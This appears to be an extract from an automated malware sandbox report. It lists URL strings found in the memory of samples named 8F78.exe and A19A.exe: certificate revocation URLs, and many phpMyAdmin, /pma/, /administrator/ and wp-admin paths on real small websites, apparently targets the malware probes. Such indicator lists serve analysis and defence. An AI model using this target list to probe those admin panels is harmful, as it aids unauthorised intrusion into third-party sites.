                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/pma/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/pma/Admin/m
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aia.startssl.com/certs/ca.crt0
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aia.startssl.com/certs/sca.code3.crt06
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aloeveraforever.sk/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aloeveraforever.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aloeveraforever.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aloeveraforever.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aloeveraforever.sk/pom
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aloeveraforever.sk/r
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://animekingdom.net/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://animekingdom.net/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquamat-liptov.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquamat-liptov.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquamat-liptov.sk/phpmyadmin/
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/.jp2
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/admin.php
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/admin.phpm
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/administrator/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/administrator/HH
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/o.uk
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clickbkk.com/pma/
                                Source: 8F78.exe, 00000007.00000002.3754866218.00000000041E2000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004257000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3740884275.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org
                                Source: 8F78.exe, 00000007.00000002.3740884275.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.orgM
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crlz
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/dvcasha2.crl0q
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.000000000424C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000424C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003EC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003EC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlC=
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000424C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlG
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlm
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSAOrganizationValidationSecureServerCA.crl
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSAOrganizationValidationSecureServerCA.crl4.0
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securecore-ca.com/SecureCoreRSADVCA.crl
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securecore-ca.com/SecureCoreRSADVCA.crla
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.startssl.com/sca-code3.crl0#
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.startssl.com/sfsca.crl0f
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl05.actalis.it/Repository/AUTH-ROOT/getLastCRL
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/U
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/k
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/phpmyadmin/R
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daxter.fsnet.co.uk/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://detmar.sk/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://detmar.sk/hchdecker.ch
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://detmar.sk/net.co.uk
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/admin.php
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/kd
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/omK
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/phpMyAdmin/D
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/phpmyadmin/Q
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dobrybicykel.sk/pma/in/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dvcasha2.ocsp-certum.com04
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/PhpMyAdmin/com
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/phpMyAdmin/2.130)
                                Source: 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/phpMyAdmin/8
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/phpMyAdmin/Z
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/ses
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-art-studio.co.jp/v
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/PhpMyAdmin/5
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/administrator/index.phpo
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/phpmyadmin/#
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e-bicycles.eu/phpmyadmin/ro.sk
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elektrospol.sk/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/phpmyadmin/l
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elossa.de/pma/Admin/sk
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elrocket.com/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elteconline.com/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elteconline.com/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elteconline.com/administrator/index.phpLTu
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elteconline.com/x6
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eluxviaggi.com/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eluxviaggi.com/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eluxviaggi.com/administrator/index.phpR
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eluxviaggi.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eluxviaggi.com/phpmyadmin/esory-servis.sk21d
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eluxviaggi.com/rvis.sk
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://emmetisportfun.it/
